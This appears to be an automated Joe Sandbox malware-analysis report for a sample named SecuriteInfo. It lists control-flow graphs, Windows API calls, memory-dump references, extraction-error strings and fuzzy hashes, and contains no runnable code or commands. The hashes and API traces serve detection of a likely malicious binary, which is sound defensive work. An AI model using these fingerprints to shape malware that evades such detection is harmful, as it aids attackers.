                                                                                                                                                                                                                                                            control_flow_graph 507 7ff72aa71050-7ff72aa710ab call 7ff72aa7b630 510 7ff72aa710ad-7ff72aa710d2 call 7ff72aa72b10 507->510 511 7ff72aa710d3-7ff72aa710eb call 7ff72aa85570 507->511 516 7ff72aa710ed-7ff72aa71104 call 7ff72aa72870 511->516 517 7ff72aa71109-7ff72aa71119 call 7ff72aa85570 511->517 522 7ff72aa71264-7ff72aa71279 call 7ff72aa7b310 call 7ff72aa8555c * 2 516->522 523 7ff72aa7111b-7ff72aa71132 call 7ff72aa72870 517->523 524 7ff72aa71137-7ff72aa71149 517->524 539 7ff72aa7127e-7ff72aa71298 522->539 523->522 526 7ff72aa71150-7ff72aa71175 call 7ff72aa80abc 524->526 533 7ff72aa7117b-7ff72aa71185 call 7ff72aa80830 526->533 534 7ff72aa7125c 526->534 533->534 540 7ff72aa7118b-7ff72aa71197 533->540 534->522 541 7ff72aa711a0-7ff72aa711c8 call 7ff72aa79a70 540->541 544 7ff72aa711ca-7ff72aa711cd 541->544 545 7ff72aa71241-7ff72aa71257 call 7ff72aa72b10 541->545 546 7ff72aa7123c 544->546 547 7ff72aa711cf-7ff72aa711d9 544->547 545->534 546->545 549 7ff72aa711db-7ff72aa711e8 call 7ff72aa811fc 547->549 550 7ff72aa71203-7ff72aa71206 547->550 555 7ff72aa711ed-7ff72aa711f0 549->555 552 7ff72aa71219-7ff72aa7121e 550->552 553 7ff72aa71208-7ff72aa71216 call 7ff72aa9ace0 550->553 552->541 554 7ff72aa71220-7ff72aa71223 552->554 553->552 557 7ff72aa71237-7ff72aa7123a 554->557 558 7ff72aa71225-7ff72aa71228 554->558 559 7ff72aa711fe-7ff72aa71201 555->559 560 7ff72aa711f2-7ff72aa711fc call 7ff72aa80830 555->560 557->534 558->545 562 7ff72aa7122a-7ff72aa71232 558->562 559->545 560->552 560->559 562->526
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                                                                                                                            • Opcode ID: c5a9a5a5a75b3a3f582f972b55239d0c98b0654be56bca29ea8b8a9d776bb01e
                                                                                                                                                                                                                                                            • Instruction ID: 110677a64df45868f48d872b85f6956c0f0661a20eddc47d075674466c821d40
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5a9a5a5a75b3a3f582f972b55239d0c98b0654be56bca29ea8b8a9d776bb01e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD51C322A0868285F720BB519C50BBEE2A1FF80794FC44175DE4D477A9EF3CE94ACB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF72AA8FB4A,?,?,-00000018,00007FF72AA8B8F7,?,?,?,00007FF72AA8B7EE,?,?,?,00007FF72AA86A32), ref: 00007FF72AA8F92C
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF72AA8FB4A,?,?,-00000018,00007FF72AA8B8F7,?,?,?,00007FF72AA8B7EE,?,?,?,00007FF72AA86A32), ref: 00007FF72AA8F938
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                            • Opcode ID: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                                                                                                                                                                                                                            • Instruction ID: d4576e2bd8c7ca24fba2709dc2f2e99edb93f804e35615f957ab1a437cfafdda
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d0b8cd1019d27a9e16eec9e317f5686f28e1310d53eba994d83145821214b12
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD41C322B19A0389FB56EB16AC00D79A2B5FF04B90F984176DD0E47784EF3CE4478B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 817 7ff72aa8c5fc-7ff72aa8c622 818 7ff72aa8c624-7ff72aa8c638 call 7ff72aa85a84 call 7ff72aa85aa4 817->818 819 7ff72aa8c63d-7ff72aa8c641 817->819 837 7ff72aa8ca2e 818->837 821 7ff72aa8ca17-7ff72aa8ca23 call 7ff72aa85a84 call 7ff72aa85aa4 819->821 822 7ff72aa8c647-7ff72aa8c64e 819->822 839 7ff72aa8ca29 call 7ff72aa8b484 821->839 822->821 824 7ff72aa8c654-7ff72aa8c682 822->824 824->821 827 7ff72aa8c688-7ff72aa8c68f 824->827 831 7ff72aa8c691-7ff72aa8c6a3 call 7ff72aa85a84 call 7ff72aa85aa4 827->831 832 7ff72aa8c6a8-7ff72aa8c6ab 827->832 831->839 835 7ff72aa8c6b1-7ff72aa8c6b7 832->835 836 7ff72aa8ca13-7ff72aa8ca15 832->836 835->836 841 7ff72aa8c6bd-7ff72aa8c6c0 835->841 840 7ff72aa8ca31-7ff72aa8ca48 836->840 837->840 839->837 841->831 844 7ff72aa8c6c2-7ff72aa8c6e7 841->844 846 7ff72aa8c6e9-7ff72aa8c6eb 844->846 847 7ff72aa8c71a-7ff72aa8c721 844->847 850 7ff72aa8c712-7ff72aa8c718 846->850 851 7ff72aa8c6ed-7ff72aa8c6f4 846->851 848 7ff72aa8c723-7ff72aa8c74b call 7ff72aa8e19c call 7ff72aa8b4ec * 2 847->848 849 7ff72aa8c6f6-7ff72aa8c70d call 7ff72aa85a84 call 7ff72aa85aa4 call 7ff72aa8b484 847->849 880 7ff72aa8c768-7ff72aa8c793 call 7ff72aa8ce24 848->880 881 7ff72aa8c74d-7ff72aa8c763 call 7ff72aa85aa4 call 7ff72aa85a84 848->881 878 7ff72aa8c8a0 849->878 852 7ff72aa8c798-7ff72aa8c7af 850->852 851->849 851->850 855 7ff72aa8c7b1-7ff72aa8c7b9 852->855 856 7ff72aa8c82a-7ff72aa8c834 call 7ff72aa9456c 852->856 855->856 859 7ff72aa8c7bb-7ff72aa8c7bd 855->859 869 7ff72aa8c83a-7ff72aa8c84f 856->869 870 7ff72aa8c8be 856->870 859->856 863 7ff72aa8c7bf-7ff72aa8c7d5 859->863 863->856 867 7ff72aa8c7d7-7ff72aa8c7e3 863->867 867->856 874 7ff72aa8c7e5-7ff72aa8c7e7 867->874 869->870 872 7ff72aa8c851-7ff72aa8c863 GetConsoleMode 869->872 876 7ff72aa8c8c3-7ff72aa8c8e3 ReadFile 870->876 872->870 877 7ff72aa8c865-7ff72aa8c86d 872->877 874->856 879 7ff72aa8c7e9-7ff72aa8c801 874->879 882 7ff72aa8c8e9-7ff72aa8c8f1 876->882 883 7ff72aa8c9dd-7ff72aa8c9e6 GetLastError 876->883 877->876 885 7ff72aa8c86f-7ff72aa8c891 ReadConsoleW 877->885 888 7ff72aa8c8a3-7ff72aa8c8ad call 7ff72aa8b4ec 878->888 879->856 889 7ff72aa8c803-7ff72aa8c80f 879->889 880->852 881->878 882->883 891 7ff72aa8c8f7 882->891 886 7ff72aa8ca03-7ff72aa8ca06 883->886 887 7ff72aa8c9e8-7ff72aa8c9fe call 7ff72aa85aa4 call 7ff72aa85a84 883->887 893 7ff72aa8c8b2-7ff72aa8c8bc 885->893 894 7ff72aa8c893 GetLastError 885->894 898 7ff72aa8c899-7ff72aa8c89b call 7ff72aa85a18 886->898 899 7ff72aa8ca0c-7ff72aa8ca0e 886->899 887->878 888->840 889->856 897 7ff72aa8c811-7ff72aa8c813 889->897 901 7ff72aa8c8fe-7ff72aa8c913 891->901 893->901 894->898 897->856 906 7ff72aa8c815-7ff72aa8c825 897->906 898->878 899->888 901->888 902 7ff72aa8c915-7ff72aa8c920 901->902 908 7ff72aa8c922-7ff72aa8c93b call 7ff72aa8c214 902->908 909 7ff72aa8c947-7ff72aa8c94f 902->909 906->856 917 7ff72aa8c940-7ff72aa8c942 908->917 913 7ff72aa8c951-7ff72aa8c963 909->913 914 7ff72aa8c9cb-7ff72aa8c9d8 call 7ff72aa8c054 909->914 918 7ff72aa8c965 913->918 919 7ff72aa8c9be-7ff72aa8c9c6 913->919 914->917 917->888 921 7ff72aa8c96a-7ff72aa8c971 918->921 919->888 922 7ff72aa8c973-7ff72aa8c977 921->922 923 7ff72aa8c9ad-7ff72aa8c9b8 921->923 924 7ff72aa8c993 922->924 925 7ff72aa8c979-7ff72aa8c980 922->925 923->919 927 7ff72aa8c999-7ff72aa8c9a9 924->927 925->924 926 7ff72aa8c982-7ff72aa8c986 925->926 926->924 928 7ff72aa8c988-7ff72aa8c991 926->928 927->921 929 7ff72aa8c9ab 927->929 928->927 929->919
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 238f6c3964800fec6045ce986a1ebb87f5daa1cce848d40dd7ddd8ba0dfe7067
                                                                                                                                                                                                                                                            • Instruction ID: 5db22064ae96675a7a53a24e307def15ff6bd79a7827eabb2d7ca9acb75cfa20
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 238f6c3964800fec6045ce986a1ebb87f5daa1cce848d40dd7ddd8ba0dfe7067
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFC1E222A0968399F760AF149844ABDF775EF80B80F9541B1DA4E07391DF7DE84A8F60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                                            • Opcode ID: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                                                                                                                                                                                                                            • Instruction ID: 50e846c83c656a7d64b1c8e186dccf7213dd21aace4a2fe050291187b948fe4c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b199e8e08dbafb2fefb291e728498370fa2251d2026f483e6f64b3b10aef1c42
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E217531A08A4386FB50AB55EC4493EE3B0EFC57A0F900275DA6D47AE4EF6CD4468F20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: GetCurrentProcess.KERNEL32 ref: 00007FF72AA78670
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: OpenProcessToken.ADVAPI32 ref: 00007FF72AA78681
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: GetTokenInformation.KERNELBASE ref: 00007FF72AA786A6
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: GetLastError.KERNEL32 ref: 00007FF72AA786B0
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: GetTokenInformation.KERNELBASE ref: 00007FF72AA786F0
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72AA7870C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA78650: CloseHandle.KERNEL32 ref: 00007FF72AA78724
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00007FF72AA73B4E), ref: 00007FF72AA789FC
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00007FF72AA78A05
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                                                                                                                            • API String ID: 6828938-1817031585
                                                                                                                                                                                                                                                            • Opcode ID: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                                                                                                                                                                                                                            • Instruction ID: 345206ee4fa43a90d53a948fe088b9c2285a68a52f2cbfdee4c3dda2b31c83ad
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA213121A1974691FB50FB20ED05EFEA275EF48780FC405B2EA4E43696DF3CD9468A60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF72AA8DAEB), ref: 00007FF72AA8DC1C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF72AA8DAEB), ref: 00007FF72AA8DCA7
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                                            • Opcode ID: 284863bd4a310ef6da540e9dcdc048057ff4d3a865a35ff47f01b15d00241537
                                                                                                                                                                                                                                                            • Instruction ID: 13fd19d4cdaecd036342e9bd5129827c4e3bf9a9b5a4f106b48b35dc575bcae6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 284863bd4a310ef6da540e9dcdc048057ff4d3a865a35ff47f01b15d00241537
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D91C262E087528DF751AF659C40ABDABB1FF04B88F9441B9DE0E56685CE78E443CB20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                                            • Opcode ID: 20717f0f8a23f829e42a50c12fade424b7597f0ff0c8303254556571f0db49b3
                                                                                                                                                                                                                                                            • Instruction ID: 5a090ac74b88e69929fd8635bca4b2bdc6a5c1fbb9601cef2f7ddf9e09b1ab90
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20717f0f8a23f829e42a50c12fade424b7597f0ff0c8303254556571f0db49b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD51C672F042128AFB14EB64DD56EBCB7B5EF80398F900275DD1E52AD5DB3CA6438A10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                                            • Opcode ID: 3d1d3b8ccd1b76bd7119aeb29c8dfefef03f5bbf8e70fbbc1af6370d66918679
                                                                                                                                                                                                                                                            • Instruction ID: dbd53388454d8e6dd69d7c0444ba0a445296cb9a64f0d209e9e6d432b1df2abd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d1d3b8ccd1b76bd7119aeb29c8dfefef03f5bbf8e70fbbc1af6370d66918679
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80518D22A047428EFB10EF60D940BBDB7B2EF48B58F904175EE0D47689DF38D8428B20
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                                                            • Opcode ID: 381f375d345d967458512f251a74178214fc3b76ffcff344aa252820e57b685e
                                                                                                                                                                                                                                                            • Instruction ID: b549af14e026b9f52090eea83fa2d7fbb992f5a58f8743527a87385e50ad3f4e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 381f375d345d967458512f251a74178214fc3b76ffcff344aa252820e57b685e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C41D322D187828BF750EB2099447A9E371FF94764F508375EE9C03AD6DF6CA5A28B10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                                            • Opcode ID: 6f7f5303e9b22c034abd0ab4f6e45a615f00bbc4bee0f7f82c8393816be5d00e
                                                                                                                                                                                                                                                            • Instruction ID: ebbd7289fe0fa8b38ad7572d1f76f392576b2c1f3fd13d187ead6fba6895d193
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f7f5303e9b22c034abd0ab4f6e45a615f00bbc4bee0f7f82c8393816be5d00e
